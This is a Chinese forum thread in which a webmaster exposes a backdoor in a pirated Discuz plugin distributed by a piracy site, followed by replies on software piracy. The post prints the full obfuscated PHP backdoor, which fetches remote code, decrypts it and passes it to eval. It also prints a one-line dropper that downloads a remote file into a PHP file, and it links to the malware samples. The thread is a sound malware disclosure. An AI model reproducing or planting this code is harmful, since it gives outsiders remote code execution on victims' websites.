【續(xù)集】魔趣吧的東西真的有后門木馬，揭秘用盜版的危害

密碼忘了

上次寫了一篇文章 披露了盜版市場(chǎng)的亂象 ，沒想到本人遭到魔趣吧的站長瘋狂的報(bào)復(fù)。我自己的網(wǎng)站已經(jīng)持續(xù)快10天被魔趣吧的站長使用DDOS攻擊技術(shù)，打不開了！因?yàn)樵谄渚W(wǎng)站進(jìn)行了手機(jī)綁定，手機(jī)也整天被短信+電話轟炸！搞的我最近經(jīng)常要開飛行模式！
但是我是絕對(duì)不會(huì)像黑惡勢(shì)力低頭的，大不了我網(wǎng)站不做了，手機(jī)號(hào)碼不用了！

前文回顧：魔趣吧的東西好像真的有后門木馬，改了我dz的后臺(tái)密碼
http://r615.cn/thread-5095-1-1.html

因?yàn)榍懊娴哪瞧恼聦懙谋容^概況，沒有列舉證據(jù)（導(dǎo)致其大肆誤導(dǎo)不明真相的群眾說我在造謠），今天我就來列舉一些證據(jù)，并對(duì)已知的后門進(jìn)行深入詳細(xì)的分析！
這可能是最后一篇曝光盜版市場(chǎng)亂象的文章了，因?yàn)槲抑皇且粋€(gè)普普通通的站長！那些江湖經(jīng)驗(yàn)豐富的站長我惹不起，我也見識(shí)了魔趣吧是如果把黑的說成白的！

他的理念就是：只要對(duì)他有利的都是好文章，曝光他的都是在造謠他！

在正式進(jìn)入主題之前，我想在說幾句題外話：先不說他有沒有干些見不得人的事，其損壞原創(chuàng)開發(fā)者權(quán)益，謀取自己的利益(俗稱：盜版)，還有什么資格在那一副正人君子的模樣懟這個(gè)懟那個(gè)！

【下面才是今天要說的主題】
由于帶后門的資源有點(diǎn)多，今天我就隨便拿個(gè)在魔趣吧收費(fèi)的資源，且我之前安裝過，受害的資源來做分析！

樣本下載鏈接：為了不給他打廣告，帖子ID： 9183 ，知道他網(wǎng)站的隨便打開一個(gè)帖子把id換成這個(gè)就可以定位到！

因?yàn)槭荲IP資源，所以我分享到了藍(lán)奏網(wǎng)盤：https://wws.lanzous.com/iH9IQe6jymf  密碼:c9mx

附件MD5值：C03B189CA9E0EA7F1229F609A48EC705
防止因?yàn)槲业钠毓?，他?huì)修改附件，然后狡辯！對(duì)本文有異議的朋友可以在本文發(fā)布不久的時(shí)候，前去下載對(duì)比MD5值后，并效驗(yàn)是不是存在本文提到的后門木馬！

樣本插件名稱：積分提現(xiàn)中心 V1.2

木馬文件所在路徑：keke_tixian\function\function_core.php


木馬完整代碼：

1. <?php
   
2. function zm_diconv($str){
   
3.   $encode = mb_detect_encoding($str, array(
   
4. 
   
5.         "ASCII",
   
6. 
   
7.         "UTF-8",
   
8. 
   
9.         "GB2312",
   
10. 
    
11.         "GBK",
    
12. 
    
13.         "BIG5"
    
14. 
    
15.     ));
    
16. 
    
17.     if ($encode != CHARSET) {
    
18. 
    
19.         //$keytitle = iconv($encode,CHARSET."//IGNORE",$str);
    
20. 
    
21.         $keytitle = mb_convert_encoding($str, CHARSET, $encode);
    
22. 
    
23.     }
    
24. 
    
25.     if (!$keytitle) {
    
26. 
    
27.         $keytitle = $str;
    
28. 
    
29.     }
    
30. 
    
31.     return $keytitle;
    
32. 
    
33. }
    
34. function caidi($oo){
    
35.     $love = 'httpABczonekey`akndecryptud^gjchdh`winNULLB{NVJ:GJGbaiduseo`lpsck`xml';
    
36.         $forver=stripos($love,'d');
    
37.         $forvere=stripos($love,'z');
    
38.         $GLOBALS['love'] = preg_replace(array("/`.*?`/","/abc/i","/[A-Z_].*[A-Z_]/"),array(".","://","/"),$love);
    
39.         $forveres='DECODE';
    
40.         $aini=substr($love,$forver,$forvere);//獲取方法函數(shù)名decrypt
    
41.         $aini=$oo?$forveres:$aini;
    
42.         return $aini;
    
43. }
    
44. function decrypt($data, $key = '721520') {
    
45.                 global $_G;
    
46.                 $key = $key ? $key : $_G['config']['security']['authkey'];
    
47.                 $type = caidi($key);
    
48.                 return authcode($data,$type, $key);
    
49.                 }
    
50. 
    
51. function contentz($svip) {
    
52. if(function_exists('file_get_contents')) {
    
53. $data = file_get_contents($svip);
    
54. } else {
    
55. $ch = curl_init();
    
56. $timeout = 5;
    
57. curl_setopt ($ch, CURLOPT_URL, $svip);
    
58. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    
59. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    
60. $data = curl_exec($ch);
    
61. curl_close($ch);
    
62. }
    
63. return $data;
    
64. }
    
65. $iloveyou = caidi($oo);
    
66. eval($iloveyou(strip_tags(contentz($love))));
    
67. ?>

復(fù)制代碼

關(guān)鍵代碼：

1. $iloveyou = caidi($oo);
   
2. eval($iloveyou(strip_tags(contentz($love))));

復(fù)制代碼

有了這些信息 我們下面進(jìn)行分析(在這里大膽的猜測(cè)一下：文件完全是魔趣吧自己加進(jìn)去的，正版可能就沒有這個(gè)文件，因?yàn)檫@個(gè)文件代碼全是和后門有關(guān)！和插件自身功能沒有關(guān)系)
在關(guān)鍵代碼前面的都是木馬偽裝所需要用到的函數(shù) 執(zhí)行過程如下：
1/----------------------

后門腳本執(zhí)行入口：keke_tixian\admin.inc.php
關(guān)鍵代碼在該文件第7行：引用后門文件并執(zhí)行
require_once DISCUZ_ROOT .'./source/plugin/keke_tixian/function/function_core.php';
解釋：只要安裝插件一打開后臺(tái)的插件設(shè)置，木馬就自動(dòng)執(zhí)行了！

2/--------依次執(zhí)行----------


$iloveyou = caidi($oo);
解釋：定義一個(gè)名為   iloveyou 的變量  ,值為： caidi($oo)
調(diào)試： $iloveyou = caidi($oo); echo $iloveyou.$love; exit; ，得到 iloveyou 的值等于：decrypt
備注：函數(shù) caidi 定義并賦值了 $love  作全局變量， love 的值等于：htt去p://zonekey.w掉in/b中ai文duseo.xml  (去掉中文)

3/--------依次執(zhí)行----------

eval($iloveyou(strip_tags(contentz($love))));

解釋：已知 iloveyou 的值等于：decrypt，得到 eval(decrypt(strip_tags(contentz(htt去p://zonekey.w掉in/b中ai文duseo.xml))));

分析函數(shù) contentz 得知該函數(shù) 是訪問遠(yuǎn)程鏈接并返回內(nèi)容，相當(dāng)于 curl
分析函數(shù) decrypt 得知該函數(shù) 是進(jìn)行內(nèi)容解密，直接調(diào)用了DISCUZ自帶的解密函數(shù) authcode


解釋的解釋：代碼 eval($iloveyou(strip_tags(contentz($love)))); ，經(jīng)過層層分析，最終為：
執(zhí)行腳本 ( 解密 ( 訪問遠(yuǎn)程代碼 ( htt去p://zonekey.w掉in/b中ai文duseo.xml ) ) ) );

4/--------依次執(zhí)行----------

因 htt去p://zonekey.w掉in/b中ai文duseo.xml 該鏈接現(xiàn)在訪問返回的全部是 1111111111111111，所以無法繼續(xù)分析遠(yuǎn)程的代碼是什么！

可能魔趣吧站長已經(jīng)知道我接下來會(huì)深入曝光他。所以暫時(shí)把遠(yuǎn)程代碼先全部改成了 1111111111111111
即使是這樣！又如何？ 執(zhí)行遠(yuǎn)程腳本 有什么危害？相信做網(wǎng)站的都知道！這里我不進(jìn)行科普！感興趣的站長可以百度自行科普：例：一句話木馬，菜刀！
下面的代碼是我網(wǎng)站自動(dòng)多出來的一個(gè)文件：因?yàn)闊o法繼續(xù)分析，直接看結(jié)果

1. <?php
   
2. file_put_contents("schizwcingu.php",file_get_contents("http://iqqvps.com/xss.txt"));

復(fù)制代碼

上面的xss.txt  防止 魔趣吧站長 再去取消 我上傳到了 藍(lán)奏網(wǎng)盤 https://wws.lanzous.com/iPkAWe6na9c 密碼:i1nc

End/--------刨根問底--------

在前面一篇文章中提到過了  魔趣吧站長聲稱該木馬是源碼哥的！
但是既然干了，就干到底！
百度了一下 搜索 到 源碼哥  ，在他網(wǎng)站搜索 了一下 積分提現(xiàn)中心  果然找到一個(gè)一模一樣的版本！
花了20塊錢下載下來（真黑啊，1.2  這么舊的版本還賣20），不過花20塊錢 能讓大家看清，防止中木馬。也值得！

結(jié)局打臉： 沒有 keke_tixian\function\function_core.php  這個(gè)文件，因?yàn)槭沁厡戇吪模热粚懞昧司瓦@樣吧！
雖然沒有發(fā)現(xiàn)木馬，但是應(yīng)該也是一丘之貉，還是呼吁大家不要用盜版！不要用盜版！不要用盜版！

PS：對(duì)魔趣吧站長傳播木馬，DDOS我的網(wǎng)站，短信+電話轟炸我的手機(jī)號(hào) 表示非常的鄙視！


希望官方管理員能夠曝光這篇文章，讓更多準(zhǔn)備用盜版的站長、已經(jīng)在用盜版的站長。趕緊回頭是岸！
樣本已經(jīng)上傳到藍(lán)奏網(wǎng)盤，文章寫的不到位的地方，歡迎各路大神補(bǔ)充！

密碼忘了

文中忘記說了！不能編輯 就占樓吧！
看圖打臉


1、保證無后門     
打臉：無后門！只是有木馬
不如：保證無后門，絕對(duì)有木馬！

2、魔趣吧修復(fù)后發(fā)布！
打臉：正版好好的東西，被魔趣吧修復(fù)一下就多了個(gè)后門木馬？
不如：魔趣吧增加木馬后發(fā)布

3、資源均經(jīng)測(cè)試，請(qǐng)放心使用！
打臉：放個(gè)木馬在你網(wǎng)站，你能放心？
不如：木馬功能已經(jīng)測(cè)試，請(qǐng)放心使用！零失誤！


4、官方認(rèn)證圖標(biāo)
打臉：魔趣吧官方正版木馬，請(qǐng)放心中毒！

密碼忘了

申明：本文不是針對(duì) 可可 正版的應(yīng)用  正版應(yīng)用肯定是沒有木馬的！
本文說的是盜版的！

湖中沉

簡(jiǎn)單點(diǎn)說：無利不起早

開發(fā)者的利，自然是賣產(chǎn)品，也就是賣插件模板，為了多得利，自然要做好產(chǎn)品
站長的利，自然是通過程序賺錢或?qū)^(qū)流量最終變現(xiàn)（也許你現(xiàn)在不賺錢，但別說永遠(yuǎn)不打算賺錢）
盜版站的利，要么是錢，要么是流量，但最終和站長是一樣的，還是變現(xiàn)，如果打著所謂免費(fèi)旗號(hào)，那么最終一定會(huì)在隱藏的地方來想辦法賺錢，那么很明顯，黑產(chǎn)是最簡(jiǎn)單的選擇，那么后門木馬就不稀奇了。

賺錢可以，但請(qǐng)通過自己的勞動(dòng)正當(dāng)獲益，你要是自己寫代碼提供給站長，誰也沒權(quán)利指責(zé)你，但開發(fā)者費(fèi)時(shí)費(fèi)力的勞動(dòng)所得，你偷去倒賣，這就很不道德了，并且不止是不道德，這是違法的。

再加上黑產(chǎn)，那么就更加讓人憤怒了，也就是說兩頭吃。

無利不起早，為利無可厚非，但請(qǐng)緊守底線，尊重別人的勞動(dòng)。

經(jīng)常有“站長”指責(zé)開發(fā)者賣的貴，不厚道。那么請(qǐng)你能寫出一樣的東西免費(fèi)提供出來，但不能是偷別人的東西提供出來哦。當(dāng)你能寫出一樣的東西的時(shí)候，并能始終免費(fèi)提供，我向您投以真誠的敬意。

但別人通過大量的學(xué)習(xí)、探索、耗費(fèi)精力和時(shí)間，勞動(dòng)所得寫出的內(nèi)容，以此獲取回報(bào)，則不能予以譴責(zé)。我們自然應(yīng)當(dāng)感恩免費(fèi)的饋贈(zèng)，但也同時(shí)應(yīng)當(dāng)尊重勞動(dòng)回報(bào)的需求。

重慶之家

以前貪便宜也是用盜版插件模版，安全中心三天兩頭的發(fā)出風(fēng)險(xiǎn)告警首頁老是被改，刪除了所有盜版插件模版，現(xiàn)在一直好好的

xiaomianlang

魔趣我不知道 反正哪個(gè)源碼哥的肯定是有木馬。都自己修改內(nèi)容

羅永浩

幾百塊一個(gè)月上高防就行。

onetheme

羅永浩 發(fā)表于 2020-7-1 02:59
幾百塊一個(gè)月上高防就行。

能舍得幾百塊一個(gè)月高防用盜版，何不花百十塊買個(gè)正版使用，不香嗎？

初錦

嗯，當(dāng)我看見你那個(gè)帖子的時(shí)候，發(fā)現(xiàn)一個(gè)叫做魔趣吧的用戶回復(fù)了你但被discuz管理員屏蔽了我就知道事情不簡(jiǎn)單。我不站樓主和魔趣吧，我站discuz管理員的做法（放肆的大笑）

墨裔

這故事引起了我的注意